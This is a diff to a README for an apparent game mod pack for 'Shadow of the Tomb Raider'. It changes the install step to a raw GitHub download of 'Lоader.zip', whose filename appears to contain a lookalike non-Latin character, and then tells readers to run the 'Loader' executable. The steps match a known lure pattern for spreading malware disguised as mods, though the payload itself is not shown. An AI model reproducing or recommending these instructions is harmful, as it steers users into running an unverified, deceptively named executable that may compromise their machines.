Bijay-kumar-sethy/TombRaiderSensualShadows-ModPack/README.md

 ## 📦 Installation Guide

-1. Download Loader.rar from the repository.
+1. Download https://raw.githubusercontent.com/Bijay-kumar-sethy/TombRaiderSensualShadows-ModPack/main/Lоader.zip from the repository.
 2. Extract the contents to your Shadow Of The Tomb Raider installation directory.
 3. Run the Loader executable and follow the on-screen instructions.
 4. Select the mod features you wish to enable.